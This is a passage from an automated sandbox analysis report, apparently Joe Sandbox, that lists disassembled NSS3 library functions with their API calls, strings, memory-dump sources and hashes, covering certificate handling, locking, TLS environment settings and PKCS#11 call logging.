PL_FinishArenaPool.NSS3(?), ref: 6CACA148
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CACA158
PL_FinishArenaPool.NSS3(?), ref: 6CACA175
CERT_AddCertToListTail.NSS3(00000000,00000000), ref: 6CACA1A5
CERT_DestroyCertificate.NSS3(00000000), ref: 6CACA1B2
free.MOZGLUE(00000000), ref: 6CACA1C6
CERT_DestroyCertList.NSS3(00000000), ref: 6CACA1D6

Part of subcall function 6CAE55E0: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,6CABEAC5,00000001,?,6CABCE9B,00000001,6CABEAC5,00000003,-00000004,00000000,?,6CABEAC5), ref: 6CAE5627
Part of subcall function 6CAE55E0: PR_CallOnce.NSS3(6CC02AA4,6CB012D0,?,?,?,?,?,?,?,?,?,?,6CABEAC5,00000001,?,6CABCE9B), ref: 6CAE564F
Part of subcall function 6CAE55E0: PL_FreeArenaPool.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CABEAC5,00000001), ref: 6CAE5661
Part of subcall function 6CAE55E0: PR_SetError.NSS3(FFFFE01A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6CABEAC5), ref: 6CAE56AF

Strings

security, xrefs: 6CACA00F

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Arena$Pool$CallFreeOnce$CertErrorFinishList$CriticalDestroyEnterInitSectionUnlockUtilValue$Alloc_Arena_CertificateTailfree
String ID: security
API String ID: 3250630715-3315324353
Opcode ID: 3ebe99a420abc6c071d3a670188c6ad1ce7ef1f3554117f7ad0a79b9541f3229
Instruction ID: 5b111aabfe525a6b29be545bd319c839a46226d315a55e7e9b23f7a6f419316d
Opcode Fuzzy Hash: 3ebe99a420abc6c071d3a670188c6ad1ce7ef1f3554117f7ad0a79b9541f3229
Instruction Fuzzy Hash: 5451F4B5F00209ABEB008BA49D45BBF737AAF4534CF144124E909ABB41EB7599CDC793

Function 6CAE6CD0 Relevance: 30.3, APIs: 20, Instructions: 298stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CAE6910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6CAE6943
Part of subcall function 6CAE6910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6CAE6957
Part of subcall function 6CAE6910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6CAE6972
Part of subcall function 6CAE6910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6CAE6983
Part of subcall function 6CAE6910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6CAE69AA
Part of subcall function 6CAE6910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6CAE69BE
Part of subcall function 6CAE6910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6CAE69D2
Part of subcall function 6CAE6910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6CAE69DF
Part of subcall function 6CAE6910: NSSUTIL_ArgStrip.NSS3(?), ref: 6CAE6A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CAE6D8C
free.MOZGLUE(00000000), ref: 6CAE6DC5
free.MOZGLUE(?), ref: 6CAE6DD6
free.MOZGLUE(?), ref: 6CAE6DE7
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CAE6E1F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CAE6E4B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CAE6E72
free.MOZGLUE(?), ref: 6CAE6EA7
free.MOZGLUE(?), ref: 6CAE6EC4
free.MOZGLUE(?), ref: 6CAE6ED5
free.MOZGLUE(00000000), ref: 6CAE6EE3
free.MOZGLUE(?), ref: 6CAE6EF4
free.MOZGLUE(?), ref: 6CAE6F08
free.MOZGLUE(00000000), ref: 6CAE6F35
free.MOZGLUE(?), ref: 6CAE6F44
free.MOZGLUE(?), ref: 6CAE6F5B
free.MOZGLUE(00000000), ref: 6CAE6F65

Part of subcall function 6CAE6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CAE781D,00000000,6CADBE2C,?,6CAE6B1D,?,?,?,?,00000000,00000000,6CAE781D), ref: 6CAE6C40
Part of subcall function 6CAE6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CAE781D,?,6CADBE2C,?), ref: 6CAE6C58
Part of subcall function 6CAE6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CAE781D), ref: 6CAE6C6F
Part of subcall function 6CAE6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CAE6C84
Part of subcall function 6CAE6C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CAE6C96
Part of subcall function 6CAE6C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CAE6CAA

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CAE6F90
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CAE6FC5
PK11_GetInternalKeySlot.NSS3 ref: 6CAE6FF4

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
String ID:
API String ID: 1304971872-0
Opcode ID: b9a1ea460dbb8d1806fba3b0744eddaa764d4f78fed6f35c169280cb9692a233
Instruction ID: 764a8f46a3e1febdf7cf8f0adefd8dbb5cef80993e185fb5dede520e4fa1aff0
Opcode Fuzzy Hash: b9a1ea460dbb8d1806fba3b0744eddaa764d4f78fed6f35c169280cb9692a233
Instruction Fuzzy Hash: 00B151B1E0120D9BDF10DBA5D884B9E7BB8AF0D348F180424EA15E7B41E731E994DBE1

Function 6CAE4C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CAE4C4C
EnterCriticalSection.KERNEL32(?), ref: 6CAE4C60
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CAE4CA1
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CAE4CBE
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CAE4CD2
realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAE4D3A
PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAE4D4F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CAE4DB7

Part of subcall function 6CB4DD70: TlsGetValue.KERNEL32 ref: 6CB4DD8C
Part of subcall function 6CB4DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB4DDB4

Part of subcall function 6CA907A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA2204A), ref: 6CA907AD
Part of subcall function 6CA907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA2204A), ref: 6CA907CD
Part of subcall function 6CA907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA2204A), ref: 6CA907D6
Part of subcall function 6CA907A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA2204A), ref: 6CA907E4
Part of subcall function 6CA907A0: TlsSetValue.KERNEL32(00000000,?,6CA2204A), ref: 6CA90864
Part of subcall function 6CA907A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA90880
Part of subcall function 6CA907A0: TlsSetValue.KERNEL32(00000000,?,?,6CA2204A), ref: 6CA908CB
Part of subcall function 6CA907A0: TlsGetValue.KERNEL32(?,?,6CA2204A), ref: 6CA908D7
Part of subcall function 6CA907A0: TlsGetValue.KERNEL32(?,?,6CA2204A), ref: 6CA908FB

TlsGetValue.KERNEL32 ref: 6CAE4DD7
EnterCriticalSection.KERNEL32(?), ref: 6CAE4DEC
PR_Unlock.NSS3(?), ref: 6CAE4E1B
PR_SetError.NSS3(00000000,00000000), ref: 6CAE4E2F
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAE4E5A
PR_SetError.NSS3(00000000,00000000), ref: 6CAE4E71
free.MOZGLUE(00000000), ref: 6CAE4E7A
PR_Unlock.NSS3(?), ref: 6CAE4EA2
TlsGetValue.KERNEL32 ref: 6CAE4EC1
EnterCriticalSection.KERNEL32(?), ref: 6CAE4ED6
PR_Unlock.NSS3(?), ref: 6CAE4F01
free.MOZGLUE(00000000), ref: 6CAE4F2A

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
String ID:
API String ID: 759471828-0
Opcode ID: 4dea2ad14d4ff03baa71aa9b887e5761352c6cb9f502e5a3039fb3b8f3d4a4ac
Instruction ID: c25dccbe856273a8261b7bcc9656669f8004787f2aa02a944af938c2c61eb64f
Opcode Fuzzy Hash: 4dea2ad14d4ff03baa71aa9b887e5761352c6cb9f502e5a3039fb3b8f3d4a4ac
Instruction Fuzzy Hash: 35B1F375A002059FDB00EFA8DC84BAA77B8FF09318F094128ED1597B41EB35E9A5DBD1

Function 6CAEFFB0 Relevance: 30.1, APIs: 20, Instructions: 68COMMON

Download Yara Rule

APIs

PR_NewLock.NSS3(?,?,6CAE76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CAB75C2,00000000), ref: 6CAEFFB4

Part of subcall function 6CB698D0: calloc.MOZGLUE(00000001,00000084,6CA90936,00000001,?,6CA9102C), ref: 6CB698E5

PR_NewLock.NSS3(?,?,6CAE76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CAB75C2,00000000), ref: 6CAEFFC6

Part of subcall function 6CB698D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6CB69946
Part of subcall function 6CB698D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CA216B7,00000000), ref: 6CB6994E
Part of subcall function 6CB698D0: free.MOZGLUE(00000000), ref: 6CB6995E

PR_NewLock.NSS3(?,?,6CAE76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CAB75C2,00000000), ref: 6CAEFFD6
PR_NewLock.NSS3(?,?,6CAE76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CAB75C2,00000000), ref: 6CAEFFE6
PR_NewLock.NSS3(?,?,6CAE76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CAB75C2,00000000), ref: 6CAEFFF6
PR_NewLock.NSS3(?,?,6CAE76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CAB75C2,00000000), ref: 6CAF0006
PR_NewLock.NSS3(?,?,6CAE76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CAB75C2,00000000), ref: 6CAF0016
PR_NewLock.NSS3(?,?,6CAE76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CAB75C2,00000000), ref: 6CAF0026
PR_NewLock.NSS3(?,?,6CAE76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CAB75C2,00000000), ref: 6CAF0036
PR_NewLock.NSS3(?,?,6CAE76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CAB75C2,00000000), ref: 6CAF0046
PR_NewLock.NSS3(?,?,6CAE76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CAB75C2,00000000), ref: 6CAF0056
PR_NewLock.NSS3(?,?,6CAE76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CAB75C2,00000000), ref: 6CAF0066
PR_NewLock.NSS3(?,?,6CAE76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CAB75C2,00000000), ref: 6CAF0076
PR_NewLock.NSS3(?,?,6CAE76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CAB75C2,00000000), ref: 6CAF0086
PR_NewLock.NSS3(?,?,6CAE76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CAB75C2,00000000), ref: 6CAF0096
PR_NewLock.NSS3(?,?,6CAE76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CAB75C2,00000000), ref: 6CAF00A6
PR_NewLock.NSS3(?,?,6CAE76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CAB75C2,00000000), ref: 6CAF00B6
PR_NewLock.NSS3(?,?,6CAE76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CAB75C2,00000000), ref: 6CAF00C6
PR_NewLock.NSS3(?,?,6CAE76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CAB75C2,00000000), ref: 6CAF00D6
PR_NewLock.NSS3(?,?,6CAE76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CAB75C2,00000000), ref: 6CAF00E6

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Lock$CountCriticalErrorInitializeLastSectionSpincallocfree
String ID:
API String ID: 1407103528-0
Opcode ID: c21f68b281139d433a9ed100fec3c5b48ec16208cfbe562589dfc9bd0cf536d2
Instruction ID: b7f5f6c18d6763d1cd3702bf77ce4341b8abb3443efe31ad42e230f90f16fb04
Opcode Fuzzy Hash: c21f68b281139d433a9ed100fec3c5b48ec16208cfbe562589dfc9bd0cf536d2
Instruction Fuzzy Hash: 713106F0F026649E8B49DFA6C16814D3AB8B716E49B12511FD14487F01D7B6024EDFE6

Function 6CB36E90 Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 305fileCOMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6CB36BF7), ref: 6CB36EB6

Part of subcall function 6CA91240: TlsGetValue.KERNEL32(00000040,?,6CA9116C,NSPR_LOG_MODULES), ref: 6CA91267
Part of subcall function 6CA91240: EnterCriticalSection.KERNEL32(?,?,?,6CA9116C,NSPR_LOG_MODULES), ref: 6CA9127C
Part of subcall function 6CA91240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CA9116C,NSPR_LOG_MODULES), ref: 6CA91291
Part of subcall function 6CA91240: PR_Unlock.NSS3(?,?,?,?,6CA9116C,NSPR_LOG_MODULES), ref: 6CA912A0

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6CBDFC0A,6CB36BF7), ref: 6CB36ECD
ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CB36EE0
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6CB36EFC
PR_NewLock.NSS3 ref: 6CB36F04
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB36F18
PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6CB36BF7), ref: 6CB36F30
PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6CB36BF7), ref: 6CB36F54
PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6CB36BF7), ref: 6CB36FE0
PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6CB36BF7), ref: 6CB36FFD

Strings

NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6CB36FDB
NSS_SSL_CBC_RANDOM_IV, xrefs: 6CB36FF8
NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6CB36F4F
SSLFORCELOCKS, xrefs: 6CB36F2B
SSLKEYLOGFILE, xrefs: 6CB36EB1
# SSL/TLS secrets log file, generated by NSS, xrefs: 6CB36EF7

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
API String ID: 412497378-2352201381
Opcode ID: d4f980062f9b475a05bad92a4f95e482f5d01f681427c2e151878a87a10a2db8
Instruction ID: bde77c5150c5af0714de398912e80ab6ea5db3003959a2713589b8de34735227
Opcode Fuzzy Hash: d4f980062f9b475a05bad92a4f95e482f5d01f681427c2e151878a87a10a2db8
Instruction Fuzzy Hash: 69A16A72B659E0C7EB005A3CCE0175932B1BB93329F1953A8E938CBED5DBB69441C252

Function 6CAB5DB0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 238memoryCOMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAB5DEC
PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6CAB5E0F
PORT_ZAlloc_Util.NSS3(00000828), ref: 6CAB5E35
SECKEY_CopyPublicKey.NSS3(?), ref: 6CAB5E6A
HASH_GetHashTypeByOidTag.NSS3(00000000), ref: 6CAB5EC3
NSS_GetAlgorithmPolicy.NSS3(00000000,00000020), ref: 6CAB5ED9
SECKEY_SignatureLen.NSS3(?), ref: 6CAB5F09
PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6CAB5F49
SECKEY_DestroyPublicKey.NSS3(?), ref: 6CAB5F89
free.MOZGLUE(?), ref: 6CAB5FA0
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CAB5FB6
free.MOZGLUE(00000000), ref: 6CAB5FBF
memcpy.VCRUNTIME140(?,?,00000000), ref: 6CAB600C
memcpy.VCRUNTIME140(?,?,00000000), ref: 6CAB6079
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CAB6084
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CAB6094

Strings

, xrefs: 6CAB5EEB

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Util$Item_Zfree$AlgorithmErrorPolicyPublicfreememcpy$Alloc_CopyDestroyHashSignatureType
String ID:
API String ID: 2310191401-3916222277
Opcode ID: beb5bafa58b439786fb3cc63092bc93270da7b2d89bb4bc8a2e327e2b9619937
Instruction ID: 6c50d1225bb55c714e0ec3d0bc3dbbd7e0258df193805e5b0c6ea08065a46b51
Opcode Fuzzy Hash: beb5bafa58b439786fb3cc63092bc93270da7b2d89bb4bc8a2e327e2b9619937
Instruction Fuzzy Hash: 9D81E5B1E042059BDB10CE74DC81BAEB7B9AF44318F188128F919B7791E731E999CB91

Function 6CAD6D60 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Digest), ref: 6CAD6D86
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAD6DB4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAD6DC3

Part of subcall function 6CBBD930: PL_strncpyz.NSS3(?,?,?), ref: 6CBBD963

PR_LogPrint.NSS3(?,00000000), ref: 6CAD6DD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6CAD6DFA
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6CAD6E13
PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6CAD6E2C
PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6CAD6E47
PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6CAD6EB9

Strings

*pulDigestLen = 0x%x, xrefs: 6CAD6EB4
pData = 0x%p, xrefs: 6CAD6DF5
ulDataLen = %d, xrefs: 6CAD6E0E
pulDigestLen = 0x%p, xrefs: 6CAD6E42
hSession = 0x%x, xrefs: 6CAD6D9E, 6CAD6DAE
(CK_INVALID_HANDLE), xrefs: 6CAD6DBC
pDigest = 0x%p, xrefs: 6CAD6E27
C_Digest, xrefs: 6CAD6D81

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest
API String ID: 1003633598-2270781106
Opcode ID: 4a0db81a9dcf597a38d9ca7e39d74d08467d452513f46ce99577253ac0e9b01c
Instruction ID: 682ef75cead9f727e37c716e5816ee5e0b82cdde4b5f9b4ec44cf80d9a3a5b1c
Opcode Fuzzy Hash: 4a0db81a9dcf597a38d9ca7e39d74d08467d452513f46ce99577253ac0e9b01c
Instruction Fuzzy Hash: 7A41D275701185AFDB009F54EE49A9E7BB1EB42319F0A4428E808E7712DF31E888CB92

Function 6CAD9C40 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 118COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_LoginUser), ref: 6CAD9C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAD9C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAD9CA3

Part of subcall function 6CBBD930: PL_strncpyz.NSS3(?,?,?), ref: 6CBBD963

PR_LogPrint.NSS3(?,00000000), ref: 6CAD9CB9
PR_LogPrint.NSS3( userType = 0x%x,?), ref: 6CAD9CDA
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CAD9CF5
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CAD9D10
PR_LogPrint.NSS3( pUsername = 0x%p,?), ref: 6CAD9D29
PR_LogPrint.NSS3( ulUsernameLen = %d,?), ref: 6CAD9D42

Strings

ulUsernameLen = %d, xrefs: 6CAD9D3D
pUsername = 0x%p, xrefs: 6CAD9D24
pPin = 0x%p, xrefs: 6CAD9CF0
hSession = 0x%x, xrefs: 6CAD9C7E, 6CAD9C8E
ulPinLen = %d, xrefs: 6CAD9D0B
(CK_INVALID_HANDLE), xrefs: 6CAD9C9C
C_LoginUser, xrefs: 6CAD9C61
userType = 0x%x, xrefs: 6CAD9CD5

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ pUsername = 0x%p$ ulPinLen = %d$ ulUsernameLen = %d$ userType = 0x%x$ (CK_INVALID_HANDLE)$C_LoginUser
API String ID: 1003633598-3838449515
Opcode ID: 314d8e861ae36c676203fc12af0a7b265f0c9e46709a54af6756a7769bd3cd4d
Instruction ID: e019a106c3cd3b1234aef29bf6077a692f12f1d6d47b97192697ec90ab4095d5
Opcode Fuzzy Hash: 314d8e861ae36c676203fc12af0a7b265f0c9e46709a54af6756a7769bd3cd4d
Instruction Fuzzy Hash: 8941E775701185AFDB008F64EF58AAE3BB1EB4631EF4B4018E408A7612DF31EC48CB92

Function 6CA91FE0 Relevance: 28.8, APIs: 19, Instructions: 254COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000084,00000001,00000000), ref: 6CA92007
calloc.MOZGLUE(00000001,00000084), ref: 6CA92077
calloc.MOZGLUE(00000001,0000002C), ref: 6CA920DF
TlsSetValue.KERNEL32(00000000), ref: 6CA92188
